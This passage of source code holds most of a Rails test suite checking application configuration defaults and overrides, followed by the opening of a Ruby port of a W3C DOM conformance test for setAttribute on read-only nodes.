app_file "app/controllers/posts_controller.rb", <<-RUBY
class PostsController < ActionController::Base
def create
render plain: params[:post].permitted? ? "permitted" : "forbidden"
end
end
RUBY
add_to_config <<-RUBY
routes.prepend do
resources :posts
end
config.action_controller.permit_all_parameters = true
RUBY
app "development"
post "/posts", post: { "title" => "zomg" }
assert_equal "permitted", last_response.body
end
test "config.action_controller.action_on_unpermitted_parameters = :raise" do
app_file "app/controllers/posts_controller.rb", <<-RUBY
class PostsController < ActionController::Base
def create
render plain: params.require(:post).permit(:name)
end
end
RUBY
add_to_config <<-RUBY
routes.prepend do
resources :posts
end
config.action_controller.action_on_unpermitted_parameters = :raise
RUBY
app "development"
require "action_controller/base"
require "action_controller/api"
assert_equal :raise, ActionController::Parameters.action_on_unpermitted_parameters
post "/posts", post: { "title" => "zomg" }
assert_match "We're sorry, but something went wrong", last_response.body
end
test "config.action_controller.always_permitted_parameters are: controller, action by default" do
app "development"
require "action_controller/base"
require "action_controller/api"
assert_equal %w(controller action), ActionController::Parameters.always_permitted_parameters
end
test "config.action_controller.always_permitted_parameters = ['controller', 'action', 'format']" do
add_to_config <<-RUBY
config.action_controller.always_permitted_parameters = %w( controller action format )
RUBY
app "development"
require "action_controller/base"
require "action_controller/api"
assert_equal %w( controller action format ), ActionController::Parameters.always_permitted_parameters
end
test "config.action_controller.always_permitted_parameters = ['controller','action','format'] does not raise exception" do
app_file "app/controllers/posts_controller.rb", <<-RUBY
class PostsController < ActionController::Base
def create
render plain: params.permit(post: [:title])
end
end
RUBY
add_to_config <<-RUBY
routes.prepend do
resources :posts
end
config.action_controller.always_permitted_parameters = %w( controller action format )
config.action_controller.action_on_unpermitted_parameters = :raise
RUBY
app "development"
require "action_controller/base"
require "action_controller/api"
assert_equal :raise, ActionController::Parameters.action_on_unpermitted_parameters
post "/posts", post: { "title" => "zomg" }, format: "json"
assert_equal 200, last_response.status
end
test "config.action_controller.action_on_unpermitted_parameters is :log by default in development" do
app "development"
require "action_controller/base"
require "action_controller/api"
assert_equal :log, ActionController::Parameters.action_on_unpermitted_parameters
end
test "config.action_controller.action_on_unpermitted_parameters is :log by default in test" do
app "test"
require "action_controller/base"
require "action_controller/api"
assert_equal :log, ActionController::Parameters.action_on_unpermitted_parameters
end
test "config.action_controller.action_on_unpermitted_parameters is false by default in production" do
app "production"
require "action_controller/base"
require "action_controller/api"
assert_equal false, ActionController::Parameters.action_on_unpermitted_parameters
end
test "config.action_controller.default_protect_from_forgery is true by default" do
app "development"
assert_equal true, ActionController::Base.default_protect_from_forgery
assert_includes ActionController::Base.__callbacks[:process_action].map(&:filter), :verify_authenticity_token
end
test "config.action_controller.permit_all_parameters can be configured in an initializer" do
app_file "config/initializers/permit_all_parameters.rb", <<-RUBY
Rails.application.config.action_controller.permit_all_parameters = true
RUBY
app "development"
require "action_controller/base"
require "action_controller/api"
assert_equal true, ActionController::Parameters.permit_all_parameters
end
test "config.action_controller.always_permitted_parameters can be configured in an initializer" do
app_file "config/initializers/always_permitted_parameters.rb", <<-RUBY
Rails.application.config.action_controller.always_permitted_parameters = []
RUBY
app "development"
require "action_controller/base"
require "action_controller/api"
assert_equal [], ActionController::Parameters.always_permitted_parameters
end
test "config.action_controller.action_on_unpermitted_parameters can be configured in an initializer" do
app_file "config/initializers/action_on_unpermitted_parameters.rb", <<-RUBY
Rails.application.config.action_controller.action_on_unpermitted_parameters = :raise
RUBY
app "development"
require "action_controller/base"
require "action_controller/api"
assert_equal :raise, ActionController::Parameters.action_on_unpermitted_parameters
end
test "config.action_dispatch.ignore_accept_header" do
make_basic_app do |application|
application.config.action_dispatch.ignore_accept_header = true
end
class ::OmgController < ActionController::Base
def index
respond_to do |format|
format.html { render plain: "HTML" }
format.xml { render plain: "XML" }
end
end
end
get "/", {}, { "HTTP_ACCEPT" => "application/xml" }
assert_equal "HTML", last_response.body
get "/", { format: :xml }, { "HTTP_ACCEPT" => "application/xml" }
assert_equal "XML", last_response.body
end
test "Rails.application#env_config exists and includes some existing parameters" do
make_basic_app
assert_equal app.env_config["action_dispatch.parameter_filter"], app.config.filter_parameters
assert_equal app.env_config["action_dispatch.show_exceptions"], app.config.action_dispatch.show_exceptions
assert_equal app.env_config["action_dispatch.logger"], Rails.logger
assert_equal app.env_config["action_dispatch.backtrace_cleaner"], Rails.backtrace_cleaner
assert_equal app.env_config["action_dispatch.key_generator"], Rails.application.key_generator
end
test "config.colorize_logging default is true" do
make_basic_app
assert app.config.colorize_logging
end
test "config.session_store with :active_record_store with activerecord-session_store gem" do
make_basic_app do |application|
ActionDispatch::Session::ActiveRecordStore = Class.new(ActionDispatch::Session::CookieStore)
application.config.session_store :active_record_store
end
ensure
ActionDispatch::Session.send :remove_const, :ActiveRecordStore
end
test "config.session_store with :active_record_store without activerecord-session_store gem" do
e = assert_raise RuntimeError do
make_basic_app do |application|
application.config.session_store :active_record_store
end
end
assert_match(/activerecord-session_store/, e.message)
end
test "default session store initializer does not overwrite the user defined session store even if it is disabled" do
make_basic_app do |application|
application.config.session_store :disabled
end
assert_nil app.config.session_store
end
test "default session store initializer sets session store to cookie store" do
session_options = { key: "_myapp_session", cookie_only: true }
make_basic_app
assert_equal ActionDispatch::Session::CookieStore, app.config.session_store
assert_equal session_options, app.config.session_options
end
test "config.log_level with custom logger" do
make_basic_app do |application|
application.config.logger = Logger.new(STDOUT)
application.config.log_level = :info
end
assert_equal Logger::INFO, Rails.logger.level
end
test "respond_to? accepts include_private" do
make_basic_app
assert_not_respond_to Rails.configuration, :method_missing
assert Rails.configuration.respond_to?(:method_missing, true)
end
test "config.active_record.dump_schema_after_migration is false on production" do
build_app
app "production"
assert_not ActiveRecord::Base.dump_schema_after_migration
end
test "config.active_record.dump_schema_after_migration is true by default in development" do
app "development"
assert ActiveRecord::Base.dump_schema_after_migration
end
test "config.active_record.verbose_query_logs is false by default in development" do
app "development"
assert_not ActiveRecord::Base.verbose_query_logs
end
test "config.annotations wrapping SourceAnnotationExtractor::Annotation class" do
make_basic_app do |application|
application.config.annotations.register_extensions("coffee") do |tag|
/#\s*(#{tag}):?\s*(.*)$/
end
end
assert_not_nil Rails::SourceAnnotationExtractor::Annotation.extensions[/\.(coffee)$/]
end
test "config.default_log_file returns a File instance" do
app "development"
assert_instance_of File, app.config.default_log_file
assert_equal Rails.application.config.paths["log"].first, app.config.default_log_file.path
end
test "rake_tasks block works at instance level" do
app_file "config/environments/development.rb", <<-RUBY
Rails.application.configure do
config.ran_block = false
rake_tasks do
config.ran_block = true
end
end
RUBY
app "development"
assert_not Rails.configuration.ran_block
require "rake"
require "rake/testtask"
require "rdoc/task"
Rails.application.load_tasks
assert Rails.configuration.ran_block
end
test "generators block works at instance level" do
app_file "config/environments/development.rb", <<-RUBY
Rails.application.configure do
config.ran_block = false
generators do
config.ran_block = true
end
end
RUBY
app "development"
assert_not Rails.configuration.ran_block
Rails.application.load_generators
assert Rails.configuration.ran_block
end
test "console block works at instance level" do
app_file "config/environments/development.rb", <<-RUBY
Rails.application.configure do
config.ran_block = false
console do
config.ran_block = true
end
end
RUBY
app "development"
assert_not Rails.configuration.ran_block
Rails.application.load_console
assert Rails.configuration.ran_block
end
test "runner block works at instance level" do
app_file "config/environments/development.rb", <<-RUBY
Rails.application.configure do
config.ran_block = false
runner do
config.ran_block = true
end
end
RUBY
app "development"
assert_not Rails.configuration.ran_block
Rails.application.load_runner
assert Rails.configuration.ran_block
end
test "loading the first existing database configuration available" do
app_file "config/environments/development.rb", <<-RUBY
Rails.application.configure do
config.paths.add 'config/database', with: 'config/nonexistent.yml'
config.paths['config/database'] << 'config/database.yml'
end
RUBY
app "development"
assert_kind_of Hash, Rails.application.config.database_configuration
end
test "autoload paths do not include asset paths" do
app "development"
ActiveSupport::Dependencies.autoload_paths.each do |path|
assert_not_operator path, :end_with?, "app/assets"
assert_not_operator path, :end_with?, "app/javascript"
end
end
test "autoload paths will exclude the configured javascript_path" do
add_to_config "config.javascript_path = 'webpack'"
app_dir("app/webpack")
app "development"
ActiveSupport::Dependencies.autoload_paths.each do |path|
assert_not_operator path, :end_with?, "app/assets"
assert_not_operator path, :end_with?, "app/webpack"
end
end
test "autoload paths are added to $LOAD_PATH by default" do
app "development"
# Action Mailer modifies AS::Dependencies.autoload_paths in-place.
autoload_paths = ActiveSupport::Dependencies.autoload_paths
autoload_paths_from_app_and_engines = autoload_paths.reject do |path|
path.end_with?("mailers/previews")
end
assert_equal true, Rails.configuration.add_autoload_paths_to_load_path
assert_empty autoload_paths_from_app_and_engines - $LOAD_PATH
# Precondition, ensure we are testing something next.
assert_not_empty Rails.configuration.paths.load_paths
assert_empty Rails.configuration.paths.load_paths - $LOAD_PATH
end
test "autoload paths are not added to $LOAD_PATH if opted-out" do
add_to_config "config.add_autoload_paths_to_load_path = false"
app "development"
assert_empty ActiveSupport::Dependencies.autoload_paths & $LOAD_PATH
# Precondition, ensure we are testing something next.
assert_not_empty Rails.configuration.paths.load_paths
assert_empty Rails.configuration.paths.load_paths - $LOAD_PATH
end
test "autoload paths can be set in the config file of the environment" do
app_dir "custom_autoload_path"
app_dir "custom_autoload_once_path"
app_dir "custom_eager_load_path"
restore_default_config
add_to_env_config "development", <<-RUBY
config.autoload_paths << "#{app_path}/custom_autoload_path"
config.autoload_once_paths << "#{app_path}/custom_autoload_once_path"
config.eager_load_paths << "#{app_path}/custom_eager_load_path"
RUBY
app "development"
Rails.application.config.tap do |config|
assert_includes config.autoload_paths, "#{app_path}/custom_autoload_path"
assert_includes config.autoload_once_paths, "#{app_path}/custom_autoload_once_path"
assert_includes config.eager_load_paths, "#{app_path}/custom_eager_load_path"
end
assert_includes $LOAD_PATH, "#{app_path}/custom_autoload_path"
assert_includes $LOAD_PATH, "#{app_path}/custom_autoload_once_path"
assert_includes $LOAD_PATH, "#{app_path}/custom_eager_load_path"
end
test "autoloading during initialization gets deprecation message and clearing if config.cache_classes is false" do
app_file "lib/c.rb", <<~EOS
class C
extend ActiveSupport::DescendantsTracker
end
class X < C
end
EOS
app_file "app/models/d.rb", <<~EOS
require "c"
class D < C
end
EOS
app_file "config/initializers/autoload.rb", "D.class"
app "development"
# TODO: Test deprecation message, assert_depcrecated { app "development" }
# does not collect it.
assert_equal [X], C.descendants
assert_empty ActiveSupport::Dependencies.autoloaded_constants
end
test "autoloading during initialization triggers nothing if config.cache_classes is true" do
app_file "lib/c.rb", <<~EOS
class C
extend ActiveSupport::DescendantsTracker
end
class X < C
end
EOS
app_file "app/models/d.rb", <<~EOS
require "c"
class D < C
end
EOS
app_file "config/initializers/autoload.rb", "D.class"
app "production"
# TODO: Test no deprecation message is issued.
assert_equal [X, D], C.descendants
end
test "load_database_yaml returns blank hash if configuration file is blank" do
app_file "config/database.yml", ""
app "development"
assert_equal({}, Rails.application.config.load_database_yaml)
end
test "raises with proper error message if no database configuration found" do
FileUtils.rm("#{app_path}/config/database.yml")
err = assert_raises RuntimeError do
app "development"
Rails.application.config.database_configuration
end
assert_match "config/database", err.message
end
test "loads database.yml using shared keys" do
app_file "config/database.yml", <<-YAML
shared:
username: bobby
adapter: sqlite3
development:
database: 'dev_db'
YAML
app "development"
ar_config = Rails.application.config.database_configuration
assert_equal "sqlite3", ar_config["development"]["adapter"]
assert_equal "bobby", ar_config["development"]["username"]
assert_equal "dev_db", ar_config["development"]["database"]
end
test "loads database.yml using shared keys for undefined environments" do
app_file "config/database.yml", <<-YAML
shared:
username: bobby
adapter: sqlite3
database: 'dev_db'
YAML
app "development"
ar_config = Rails.application.config.database_configuration
assert_equal "sqlite3", ar_config["development"]["adapter"]
assert_equal "bobby", ar_config["development"]["username"]
assert_equal "dev_db", ar_config["development"]["database"]
end
test "config.action_mailer.show_previews defaults to true in development" do
app "development"
assert Rails.application.config.action_mailer.show_previews
end
test "config.action_mailer.show_previews defaults to false in production" do
app "production"
assert_equal false, Rails.application.config.action_mailer.show_previews
end
test "config.action_mailer.show_previews can be set in the configuration file" do
add_to_config <<-RUBY
config.action_mailer.show_previews = true
RUBY
app "production"
assert_equal true, Rails.application.config.action_mailer.show_previews
end
test "config_for loads custom configuration from yaml accessible as symbol or string" do
set_custom_config <<~RUBY
development:
foo: "bar"
RUBY
app "development"
assert_equal "bar", Rails.application.config.my_custom_config[:foo]
assert_equal "bar", Rails.application.config.my_custom_config["foo"]
end
test "config_for loads nested custom configuration from yaml as symbol keys" do
set_custom_config <<~RUBY
development:
foo:
bar:
baz: 1
RUBY
app "development"
assert_equal 1, Rails.application.config.my_custom_config[:foo][:bar][:baz]
end
test "config_for makes all hash methods available" do
set_custom_config <<~RUBY
development:
foo: 0
bar:
baz: 1
RUBY
app "development"
actual = Rails.application.config.my_custom_config
assert_equal({ foo: 0, bar: { baz: 1 } }, actual)
assert_equal([ :foo, :bar ], actual.keys)
assert_equal([ 0, baz: 1], actual.values)
assert_equal({ foo: 0, bar: { baz: 1 } }, actual.to_h)
assert_equal(0, actual[:foo])
assert_equal({ baz: 1 }, actual[:bar])
end
test "config_for does not assume config is a hash" do
set_custom_config <<~RUBY
development:
- foo
- bar
RUBY
app "development"
assert_equal %w( foo bar ), Rails.application.config.my_custom_config
end
test "config_for uses the Pathname object if it is provided" do
set_custom_config <<~RUBY, "Pathname.new(Rails.root.join('config/custom.yml'))"
development:
key: 'custom key'
RUBY
app "development"
assert_equal "custom key", Rails.application.config.my_custom_config[:key]
end
test "config_for raises an exception if the file does not exist" do
add_to_config <<-RUBY
config.my_custom_config = config_for('custom')
RUBY
exception = assert_raises(RuntimeError) do
app "development"
end
assert_equal "Could not load configuration. No such file - #{app_path}/config/custom.yml", exception.message
end
test "config_for without the environment configured returns nil" do
set_custom_config <<~RUBY
test:
key: 'custom key'
RUBY
app "development"
assert_nil Rails.application.config.my_custom_config
end
test "config_for shared config is overridden" do
set_custom_config <<~RUBY
shared:
foo: :from_shared
test:
foo: :from_env
RUBY
app "test"
assert_equal :from_env, Rails.application.config.my_custom_config[:foo]
end
test "config_for shared config is returned when environment is missing" do
set_custom_config <<~RUBY
shared:
foo: :from_shared
test:
foo: :from_env
RUBY
app "development"
assert_equal :from_shared, Rails.application.config.my_custom_config[:foo]
end
test "config_for merges shared configuration deeply" do
set_custom_config <<~RUBY
shared:
foo:
bar:
baz: 1
development:
foo:
bar:
qux: 2
RUBY
app "development"
assert_equal({ baz: 1, qux: 2 }, Rails.application.config.my_custom_config[:foo][:bar])
end
test "config_for with empty file returns nil" do
set_custom_config ""
app "development"
assert_nil Rails.application.config.my_custom_config
end
test "config_for containing ERB tags should evaluate" do
set_custom_config <<~RUBY
development:
key: <%= 'custom key' %>
RUBY
app "development"
assert_equal "custom key", Rails.application.config.my_custom_config[:key]
end
test "config_for with syntax error show a more descriptive exception" do
set_custom_config <<~RUBY
development:
key: foo:
RUBY
error = assert_raises RuntimeError do
app "development"
end
assert_match "YAML syntax error occurred while parsing", error.message
end
test "config_for allows overriding the environment" do
set_custom_config <<~RUBY, "'custom', env: 'production'"
test:
key: 'walrus'
production:
key: 'unicorn'
RUBY
require "#{app_path}/config/environment"
assert_equal "unicorn", Rails.application.config.my_custom_config[:key]
end
test "api_only is false by default" do
app "development"
assert_not Rails.application.config.api_only
end
test "api_only generator config is set when api_only is set" do
add_to_config <<-RUBY
config.api_only = true
RUBY
app "development"
Rails.application.load_generators
assert Rails.configuration.api_only
end
test "debug_exception_response_format is :api by default if api_only is enabled" do
add_to_config <<-RUBY
config.api_only = true
RUBY
app "development"
assert_equal :api, Rails.configuration.debug_exception_response_format
end
test "debug_exception_response_format can be overridden" do
add_to_config <<-RUBY
config.api_only = true
RUBY
app_file "config/environments/development.rb", <<-RUBY
Rails.application.configure do
config.debug_exception_response_format = :default
end
RUBY
app "development"
assert_equal :default, Rails.configuration.debug_exception_response_format
end
test "ActiveRecord::Base.has_many_inversing is true by default for new apps" do
app "development"
assert_equal true, ActiveRecord::Base.has_many_inversing
end
test "ActiveRecord::Base.has_many_inversing is false by default for upgraded apps" do
remove_from_config '.*config\.load_defaults.*\n'
app "development"
assert_equal false, ActiveRecord::Base.has_many_inversing
end
test "ActiveRecord::Base.has_many_inversing can be configured via config.active_record.has_many_inversing" do
remove_from_config '.*config\.load_defaults.*\n'
app_file "config/initializers/new_framework_defaults_6_1.rb", <<-RUBY
Rails.application.config.active_record.has_many_inversing = true
RUBY
app "development"
assert_equal true, ActiveRecord::Base.has_many_inversing
end
test "ActiveSupport::MessageEncryptor.use_authenticated_message_encryption is true by default for new apps" do
app "development"
assert_equal true, ActiveSupport::MessageEncryptor.use_authenticated_message_encryption
end
test "ActiveSupport::MessageEncryptor.use_authenticated_message_encryption is false by default for upgraded apps" do
remove_from_config '.*config\.load_defaults.*\n'
app "development"
assert_equal false, ActiveSupport::MessageEncryptor.use_authenticated_message_encryption
end
test "ActiveSupport::MessageEncryptor.use_authenticated_message_encryption can be configured via config.active_support.use_authenticated_message_encryption" do
remove_from_config '.*config\.load_defaults.*\n'
app_file "config/initializers/new_framework_defaults_6_0.rb", <<-RUBY
Rails.application.config.active_support.use_authenticated_message_encryption = true
RUBY
app "development"
assert_equal true, ActiveSupport::MessageEncryptor.use_authenticated_message_encryption
end
test "ActiveSupport::Digest.hash_digest_class is Digest::SHA1 by default for new apps" do
app "development"
assert_equal Digest::SHA1, ActiveSupport::Digest.hash_digest_class
end
test "ActiveSupport::Digest.hash_digest_class is Digest::MD5 by default for upgraded apps" do
remove_from_config '.*config\.load_defaults.*\n'
app "development"
assert_equal Digest::MD5, ActiveSupport::Digest.hash_digest_class
end
test "ActiveSupport::Digest.hash_digest_class can be configured via config.active_support.use_sha1_digests" do
remove_from_config '.*config\.load_defaults.*\n'
app_file "config/initializers/new_framework_defaults_6_0.rb", <<-RUBY
Rails.application.config.active_support.use_sha1_digests = true
RUBY
app "development"
assert_equal Digest::SHA1, ActiveSupport::Digest.hash_digest_class
end
test "custom serializers should be able to set via config.active_job.custom_serializers in an initializer" do
class ::DummySerializer < ActiveJob::Serializers::ObjectSerializer; end
app_file "config/initializers/custom_serializers.rb", <<-RUBY
Rails.application.config.active_job.custom_serializers << DummySerializer
RUBY
app "development"
assert_includes ActiveJob::Serializers.serializers, DummySerializer
end
test "ActionView::Helpers::FormTagHelper.default_enforce_utf8 is false by default" do
app "development"
assert_equal false, ActionView::Helpers::FormTagHelper.default_enforce_utf8
end
test "ActionView::Helpers::FormTagHelper.default_enforce_utf8 is true in an upgraded app" do
remove_from_config '.*config\.load_defaults.*\n'
add_to_config 'config.load_defaults "5.2"'
app "development"
assert_equal true, ActionView::Helpers::FormTagHelper.default_enforce_utf8
end
test "ActionView::Helpers::FormTagHelper.default_enforce_utf8 can be configured via config.action_view.default_enforce_utf8" do
remove_from_config '.*config\.load_defaults.*\n'
app_file "config/initializers/new_framework_defaults_6_0.rb", <<-RUBY
Rails.application.config.action_view.default_enforce_utf8 = true
RUBY
app "development"
assert_equal true, ActionView::Helpers::FormTagHelper.default_enforce_utf8
end
test "ActionView::Template.finalize_compiled_template_methods is true by default" do
app "test"
assert_deprecated do
ActionView::Template.finalize_compiled_template_methods
end
end
test "ActionView::Template.finalize_compiled_template_methods can be configured via config.action_view.finalize_compiled_template_methods" do
app_file "config/environments/test.rb", <<-RUBY
Rails.application.configure do
config.action_view.finalize_compiled_template_methods = false
end
RUBY
app "test"
assert_deprecated do
ActionView::Template.finalize_compiled_template_methods
end
end
test "ActiveJob::Base.retry_jitter is 0.15 by default" do
app "development"
assert_equal 0.15, ActiveJob::Base.retry_jitter
end
test "ActiveJob::Base.retry_jitter can be set by config" do
app "development"
Rails.application.config.active_job.retry_jitter = 0.22
assert_equal 0.22, ActiveJob::Base.retry_jitter
end
test "ActiveJob::Base.return_false_on_aborted_enqueue is true by default" do
app "development"
assert_equal true, ActiveJob::Base.return_false_on_aborted_enqueue
end
test "ActiveJob::Base.return_false_on_aborted_enqueue is false in the 5.x defaults" do
remove_from_config '.*config\.load_defaults.*\n'
add_to_config 'config.load_defaults "5.2"'
app "development"
assert_equal false, ActiveJob::Base.return_false_on_aborted_enqueue
end
test "ActiveJob::Base.return_false_on_aborted_enqueue can be configured in the new framework defaults" do
remove_from_config '.*config\.load_defaults.*\n'
app_file "config/initializers/new_framework_defaults_6_0.rb", <<-RUBY
Rails.application.config.active_job.return_false_on_aborted_enqueue = true
RUBY
app "development"
assert_equal true, ActiveJob::Base.return_false_on_aborted_enqueue
end
test "ActiveJob::Base.skip_after_callbacks_if_terminated is true by default" do
app "development"
assert_equal true, ActiveJob::Base.skip_after_callbacks_if_terminated
end
test "ActiveJob::Base.skip_after_callbacks_if_terminated is false in the 6.0 defaults" do
remove_from_config '.*config\.load_defaults.*\n'
add_to_config 'config.load_defaults "6.0"'
app "development"
assert_equal false, ActiveJob::Base.skip_after_callbacks_if_terminated
end
test "Rails.application.config.action_dispatch.cookies_same_site_protection is :lax by default" do
app "production"
assert_equal :lax, Rails.application.config.action_dispatch.cookies_same_site_protection
end
test "Rails.application.config.action_dispatch.cookies_same_site_protection is :lax can be overridden" do
app_file "config/environments/production.rb", <<~RUBY
Rails.application.configure do
config.action_dispatch.cookies_same_site_protection = :strict
end
RUBY
app "production"
assert_equal :strict, Rails.application.config.action_dispatch.cookies_same_site_protection
end
test "Rails.application.config.action_dispatch.cookies_same_site_protection is :lax in 6.1 defaults" do
remove_from_config '.*config\.load_defaults.*\n'
add_to_config 'config.load_defaults "6.1"'
app "development"
assert_equal :lax, Rails.application.config.action_dispatch.cookies_same_site_protection
end
test "ActiveSupport.utc_to_local_returns_utc_offset_times is true in 6.1 defaults" do
remove_from_config '.*config\.load_defaults.*\n'
add_to_config 'config.load_defaults "6.1"'
app "development"
assert_equal true, ActiveSupport.utc_to_local_returns_utc_offset_times
end
test "ActiveSupport.utc_to_local_returns_utc_offset_times is false in 6.0 defaults" do
remove_from_config '.*config\.load_defaults.*\n'
add_to_config 'config.load_defaults "6.0"'
app "development"
assert_equal false, ActiveSupport.utc_to_local_returns_utc_offset_times
end
test "ActiveSupport.utc_to_local_returns_utc_offset_times can be configured in an initializer" do
remove_from_config '.*config\.load_defaults.*\n'
add_to_config 'config.load_defaults "6.0"'
app_file "config/initializers/new_framework_defaults_6_1.rb", <<-RUBY
ActiveSupport.utc_to_local_returns_utc_offset_times = true
RUBY
app "development"
assert_equal true, ActiveSupport.utc_to_local_returns_utc_offset_times
end
test "ActiveStorage.queues[:analysis] is :active_storage_analysis by default" do
app "development"
assert_equal :active_storage_analysis, ActiveStorage.queues[:analysis]
end
test "ActiveStorage.queues[:analysis] is nil without Rails 6 defaults" do
remove_from_config '.*config\.load_defaults.*\n'
app "development"
assert_nil ActiveStorage.queues[:analysis]
end
test "ActiveStorage.queues[:purge] is :active_storage_purge by default" do
app "development"
assert_equal :active_storage_purge, ActiveStorage.queues[:purge]
end
test "ActiveStorage.queues[:purge] is nil without Rails 6 defaults" do
remove_from_config '.*config\.load_defaults.*\n'
app "development"
assert_nil ActiveStorage.queues[:purge]
end
test "ActionDispatch::Response.return_only_media_type_on_content_type is false by default" do
app "development"
assert_equal false, ActionDispatch::Response.return_only_media_type_on_content_type
end
test "ActionDispatch::Response.return_only_media_type_on_content_type is true in the 5.x defaults" do
remove_from_config '.*config\.load_defaults.*\n'
add_to_config 'config.load_defaults "5.2"'
app "development"
assert_equal true, ActionDispatch::Response.return_only_media_type_on_content_type
end
test "ActionDispatch::Response.return_only_media_type_on_content_type can be configured in the new framework defaults" do
remove_from_config '.*config\.load_defaults.*\n'
app_file "config/initializers/new_framework_defaults_6_0.rb", <<-RUBY
Rails.application.config.action_dispatch.return_only_media_type_on_content_type = false
RUBY
app "development"
assert_equal false, ActionDispatch::Response.return_only_media_type_on_content_type
end
test "ActionMailbox.logger is Rails.logger by default" do
app "development"
assert_equal Rails.logger, ActionMailbox.logger
end
test "ActionMailbox.logger can be configured" do
app_file "lib/my_logger.rb", <<-RUBY
require "logger"
class MyLogger < ::Logger
end
RUBY
add_to_config <<-RUBY
require "my_logger"
config.action_mailbox.logger = MyLogger.new(STDOUT)
RUBY
app "development"
assert_equal "MyLogger", ActionMailbox.logger.class.name
end
test "ActionMailbox.incinerate_after is 30.days by default" do
app "development"
assert_equal 30.days, ActionMailbox.incinerate_after
end
test "ActionMailbox.incinerate_after can be configured" do
add_to_config <<-RUBY
config.action_mailbox.incinerate_after = 14.days
RUBY
app "development"
assert_equal 14.days, ActionMailbox.incinerate_after
end
test "ActionMailbox.queues[:incineration] is :action_mailbox_incineration by default" do
app "development"
assert_equal :action_mailbox_incineration, ActionMailbox.queues[:incineration]
end
test "ActionMailbox.queues[:incineration] can be configured" do
add_to_config <<-RUBY
config.action_mailbox.queues.incineration = :another_queue
RUBY
app "development"
assert_equal :another_queue, ActionMailbox.queues[:incineration]
end
test "ActionMailbox.queues[:routing] is :action_mailbox_routing by default" do
app "development"
assert_equal :action_mailbox_routing, ActionMailbox.queues[:routing]
end
test "ActionMailbox.queues[:routing] can be configured" do
add_to_config <<-RUBY
config.action_mailbox.queues.routing = :another_queue
RUBY
app "development"
assert_equal :another_queue, ActionMailbox.queues[:routing]
end
test "ActionMailer::Base.delivery_job is ActionMailer::MailDeliveryJob by default" do
app "development"
assert_equal ActionMailer::MailDeliveryJob, ActionMailer::Base.delivery_job
end
test "ActiveRecord::Base.filter_attributes should equal to filter_parameters" do
app_file "config/initializers/filter_parameters_logging.rb", <<-RUBY
Rails.application.config.filter_parameters += [ :password, :credit_card_number ]
RUBY
app "development"
assert_equal [ :password, :credit_card_number ], Rails.application.config.filter_parameters
assert_equal [ :password, :credit_card_number ], ActiveRecord::Base.filter_attributes
end
test "ActiveStorage.routes_prefix can be configured via config.active_storage.routes_prefix" do
app_file "config/environments/development.rb", <<-RUBY
Rails.application.configure do
config.active_storage.routes_prefix = '/files'
end
RUBY
output = rails("routes", "-g", "active_storage")
assert_equal <<~MESSAGE, output
Prefix Verb URI Pattern Controller#Action
rails_service_blob GET /files/blobs/:signed_id/*filename(.:format) active_storage/blobs#show
rails_blob_representation GET /files/representations/:signed_blob_id/:variation_key/*filename(.:format) active_storage/representations#show
rails_disk_service GET /files/disk/:encoded_key/*filename(.:format) active_storage/disk#show
update_rails_disk_service PUT /files/disk/:encoded_token(.:format) active_storage/disk#update
rails_direct_uploads POST /files/direct_uploads(.:format) active_storage/direct_uploads#create
MESSAGE
end
test "ActiveStorage.draw_routes can be configured via config.active_storage.draw_routes" do
app_file "config/environments/development.rb", <<-RUBY
Rails.application.configure do
config.active_storage.draw_routes = false
end
RUBY
output = rails("routes")
assert_not_includes(output, "rails_service_blob")
assert_not_includes(output, "rails_blob_representation")
assert_not_includes(output, "rails_disk_service")
assert_not_includes(output, "update_rails_disk_service")
assert_not_includes(output, "rails_direct_uploads")
end
test "hosts include .localhost in development" do
app "development"
assert_includes Rails.application.config.hosts, ".localhost"
end
test "disable_sandbox is false by default" do
app "development"
assert_equal false, Rails.configuration.disable_sandbox
end
test "disable_sandbox can be overridden" do
add_to_config <<-RUBY
config.disable_sandbox = true
RUBY
app "development"
assert Rails.configuration.disable_sandbox
end
test "rake_eager_load is false by default" do
app "development"
assert_equal false, Rails.application.config.rake_eager_load
end
test "rake_eager_load is set correctly" do
add_to_config <<-RUBY
config.root = "#{app_path}"
config.rake_eager_load = true
RUBY
app "development"
assert_equal true, Rails.application.config.rake_eager_load
end
private
def set_custom_config(contents, config_source = "custom".inspect)
app_file "config/custom.yml", contents
add_to_config <<~RUBY
config.my_custom_config = config_for(#{config_source})
RUBY
end
end
end
| 30.633526 | 163 | 0.685096 |
280908d8d05a9818f6b1e56c06979daafec4cfca | 3,648 |
###
# This Ruby source file was generated by test-to-ruby.xsl
# and is a derived work from the source document.
# The source document contained the following notice:
=begin
Copyright (c) 2001-2004 World Wide Web Consortium,
(Massachusetts Institute of Technology, Institut National de
Recherche en Informatique et en Automatique, Keio University). All
Rights Reserved. This program is distributed under the W3C's Software
Intellectual Property License. This program is distributed in the
hope that it will be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE.
See W3C License http://www.w3.org/Consortium/Legal/ for more details.
=end
#
require File.expand_path(File.join(File.dirname(__FILE__), '..', '..', '..', 'helper'))
###
# The "setAttribute(name,value)" method for an attribute causes the
# DOMException NO_MODIFICATION_ALLOWED_ERR to be raised
# if the node is readonly.
#
# Obtain the children of the THIRD "gender" element. The elements
# content is an entity reference. Try to remove the "domestic" attribute
# from the entity reference by executing the "setAttribute(name,value)" method.
# This causes a NO_MODIFICATION_ALLOWED_ERR DOMException to be thrown.
# @author NIST
# @author Mary Brady
# see[http://www.w3.org/TR/1998/REC-DOM-Level-1-19981001/level-one-core#xpointer(id('ID-258A00AF')/constant[@name='NO_MODIFICATION_ALLOWED_ERR'])]
# see[http://www.w3.org/TR/1998/REC-DOM-Level-1-19981001/level-one-core#ID-F68F082]
# see[http://www.w3.org/TR/1998/REC-DOM-Level-1-19981001/level-one-core#xpointer(id('ID-F68F082')/raises/exception[@name='DOMException']/descr/p[substring-before(.,':')='NO_MODIFICATION_ALLOWED_ERR'])]
# see[http://www.w3.org/TR/1998/REC-DOM-Level-1-19981001/level-one-core#ID-F68F082]
##
DOMTestCase('elementsetattributenomodificationallowederr') do
###
# Constructor.
# @param factory document factory, may not be null
# @throws org.w3c.domts.DOMTestIncompatibleException Thrown if test is not compatible with parser configuration
##
def setup
=begin
org.w3c.domts.DocumentBuilderSetting[] settings =
new org.w3c.domts.DocumentBuilderSetting[] {
org.w3c.domts.DocumentBuilderSetting.notExpandEntityReferences
};
DOMTestDocumentBuilderFactory testFactory = factory.newInstance(settings)
setFactory(testFactory)
=end
##
## check if loaded documents are supported for content type
##
